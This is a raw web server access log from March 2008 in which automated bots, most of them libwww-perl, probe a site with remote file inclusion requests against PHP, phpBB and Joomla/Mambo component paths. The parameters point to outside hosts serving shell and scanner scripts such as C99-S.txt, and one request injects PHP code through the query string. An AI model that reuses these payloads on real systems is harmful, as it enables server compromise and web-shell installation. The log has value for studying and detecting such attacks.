65.38.190.229 - - [16/Mar/2008:06:28:42 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.190.229 - - [16/Mar/2008:06:28:42 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.105.208.186 - - [16/Mar/2008:06:28:51 -0700] "GET /logs/access_080228.log//com_zoom/includes/database.php?mosConfig_absolute_path=http://keesenmirjam.nl/media/C99-S.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [16/Mar/2008:06:28:54 -0700] "GET //com_zoom/includes/database.php?mosConfig_absolute_path=http://keesenmirjam.nl/media/C99-S.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [16/Mar/2008:06:29:04 -0700] "GET /logs//com_zoom/includes/database.php?mosConfig_absolute_path=http://keesenmirjam.nl/media/C99-S.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.61.90 - - [16/Mar/2008:06:29:12 -0700] "GET /config.php?path_to_root=http://yugifire.t35.com/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:06:30:10 -0700] "GET /mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:06:30:10 -0700] "GET /mcf.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:06:30:15 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.235.74 - - [16/Mar/2008:06:30:56 -0700] "GET /logs/access_080118.log/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [16/Mar/2008:06:30:57 -0700] "GET /logs/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:06:32:08 -0700] "GET /logs/access_080215.log/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:06:32:08 -0700] "GET /logs/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.211.37.139 - - [16/Mar/2008:06:33:55 -0700] "GET /logs/access_080131.log/index.php?id1=http://www.hagenclauss.de//vwar/convert/.r/bush?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.211.37.139 - - [16/Mar/2008:06:33:56 -0700] "GET /index.php?id1=http://www.hagenclauss.de//vwar/convert/.r/bush?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.211.37.139 - - [16/Mar/2008:06:33:57 -0700] "GET /logs/index.php?id1=http://www.hagenclauss.de//vwar/convert/.r/bush?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:06:34:32 -0700] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:06:34:32 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:06:36:00 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.194.85.198 - - [16/Mar/2008:06:38:27 -0700] "GET /logs//?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 200 38981 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
82.194.85.198 - - [16/Mar/2008:06:38:28 -0700] "GET //?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 200 3094 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
202.142.220.82 - - [16/Mar/2008:06:38:39 -0700] "GET /logs/access_080215.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.162.98 - - [16/Mar/2008:06:39:11 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.gomaka.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
67.212.162.98 - - [16/Mar/2008:06:39:11 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.gomaka.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.105.208.186 - - [16/Mar/2008:06:40:05 -0700] "GET /logs/access.log//com_zoom/includes/database.php?mosConfig_absolute_path=http://keesenmirjam.nl/media/C99-S.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.216.61 - - [16/Mar/2008:06:40:42 -0700] "GET /logs/!scanhttp://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
66.98.216.61 - - [16/Mar/2008:06:40:47 -0700] "GET /!scanhttp://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
67.19.61.90 - - [16/Mar/2008:06:41:12 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://yugifire.t35.com/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.61.90 - - [16/Mar/2008:06:41:12 -0700] "GET /logs/config.php?path_to_root=http://yugifire.t35.com/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.7.194 - - [16/Mar/2008:06:42:12 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php=http://www.fansvictorvaldes.es///components/com_rwcards/bmx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.61.90 - - [16/Mar/2008:06:42:13 -0700] "GET /logs/access_080228.log/config.php?path_to_root=http://yugifire.t35.com/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.247.44.96 - - [16/Mar/2008:06:42:27 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.247.44.96 - - [16/Mar/2008:06:42:28 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.247.44.96 - - [16/Mar/2008:06:42:52 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.204.230.31 - - [16/Mar/2008:06:43:03 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bossad.com/LoTnoK.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.133.237 - - [16/Mar/2008:06:43:28 -0700] "GET /logs/access_071229.log/werbungFrame.php?do=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.133.237 - - [16/Mar/2008:06:43:29 -0700] "GET /werbungFrame.php?do=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.133.237 - - [16/Mar/2008:06:43:29 -0700] "GET /logs/werbungFrame.php?do=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.133.237 - - [16/Mar/2008:06:43:37 -0700] "GET /logs/access_080117.log/werbungFrame.php?do=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.134.186 - - [16/Mar/2008:06:44:32 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.134.186 - - [16/Mar/2008:06:44:33 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.216.61 - - [16/Mar/2008:06:48:16 -0700] "GET /logs/access_080228.log%20%20//index.php?option=com_restaurante&task=http://www.ibtekarat.com/mychat/chat/localization/romanian/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.87 - - [16/Mar/2008:06:48:18 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.75 - - [16/Mar/2008:06:48:19 -0700] "GET /logs/access_080119.log HTTP/1.0" 200 618239 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.55.133.237 - - [16/Mar/2008:06:49:40 -0700] "GET /logs/access_071229.log/view.php?table=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.133.237 - - [16/Mar/2008:06:49:40 -0700] "GET /view.php?table=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.133.237 - - [16/Mar/2008:06:49:40 -0700] "GET /logs/view.php?table=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.216.61 - - [16/Mar/2008:06:49:44 -0700] "GET /logs/access.log%20%20//index.php?option=com_restaurante&task=http://www.ibtekarat.com/mychat/chat/localization/romanian/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.87.60.4 - - [16/Mar/2008:06:49:58 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php=http://www.fansvictorvaldes.es///components/com_rwcards/bmx.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
124.217.247.200 - - [16/Mar/2008:06:50:20 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.7.194 - - [16/Mar/2008:06:50:34 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php=http://www.fansvictorvaldes.es///components/com_rwcards/bmx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [16/Mar/2008:06:50:35 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php=http://www.fansvictorvaldes.es///components/com_rwcards/bmx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [16/Mar/2008:06:50:47 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php=http://www.fansvictorvaldes.es///components/com_rwcards/bmx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.79.236.170 - - [16/Mar/2008:06:50:49 -0700] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.congressovirtualmgf.com/includes/js/calendar/lang/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.96.133.55 - - [16/Mar/2008:06:51:01 -0700] "GET //index.php?option=com_admin&Itemid50&mosConfig_absolute_path=http://2007.cultuurmarathon.nl/site/components/com_web/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
83.96.133.55 - - [16/Mar/2008:06:51:01 -0700] "GET /logs//index.php?option=com_admin&Itemid50&mosConfig_absolute_path=http://2007.cultuurmarathon.nl/site/components/com_web/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
84.19.178.241 - - [16/Mar/2008:06:52:05 -0700] "GET /logs/access_080211.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/haeck/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:06:52:17 -0700] "GET /logs/access_080225.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:06:52:17 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:06:52:17 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.6.20.200 - - [16/Mar/2008:06:53:02 -0700] "GET /plans/?S=A HTTP/1.0" 200 1095 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.199.248.34 - - [16/Mar/2008:06:53:18 -0700] "GET /config.php?path_to_root=http://yugifire.t35.com/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.216.61 - - [16/Mar/2008:06:53:19 -0700] "GET /logs//index.php?option=com_restaurante&task=http://www.ibtekarat.com/mychat/chat/localization/romanian/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:06:53:27 -0700] "GET /logs/access_080215.log/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:06:53:27 -0700] "GET /logs/access_080215.log/mcf.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:06:53:27 -0700] "GET /logs/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:06:53:28 -0700] "GET /logs/mcf.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.196.80.130 - - [16/Mar/2008:06:53:36 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://contactcraze.com/cmd-asc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.80.130 - - [16/Mar/2008:06:53:36 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://contactcraze.com/cmd-asc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.80.130 - - [16/Mar/2008:06:53:37 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://contactcraze.com/cmd-asc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.184.55 - - [16/Mar/2008:06:53:37 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sigma.murcki.pl/mambots/editors/tinymce/jscripts/tinymce/idm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:06:54:28 -0700] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:06:54:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:06:54:30 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:54:48 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:54:48 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:54:48 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:06:54:54 -0700] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:09 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:09 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:09 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:11 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:11 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:11 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:15 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:15 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:15 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:44 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:44 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:44 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:50 -0700] "GET /logs/access_080131.log/scanhttp://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:50 -0700] "GET /scanhttp://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:50 -0700] "GET /logs/scanhttp://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:53 -0700] "GET /logs/access_080131.log/scanhttp://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:54 -0700] "GET /scanhttp://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:55:54 -0700] "GET /logs/scanhttp://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:06 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:06 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:06 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:06:56:12 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:06:56:13 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:06:56:13 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:23 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:23 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:23 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:29 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:29 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:29 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:38 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:38 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:38 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:47 -0700] "GET /logs/access_080211.log/scanhttp://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:47 -0700] "GET /logs/access_080211.log/scanhttp://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:06:56:55 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
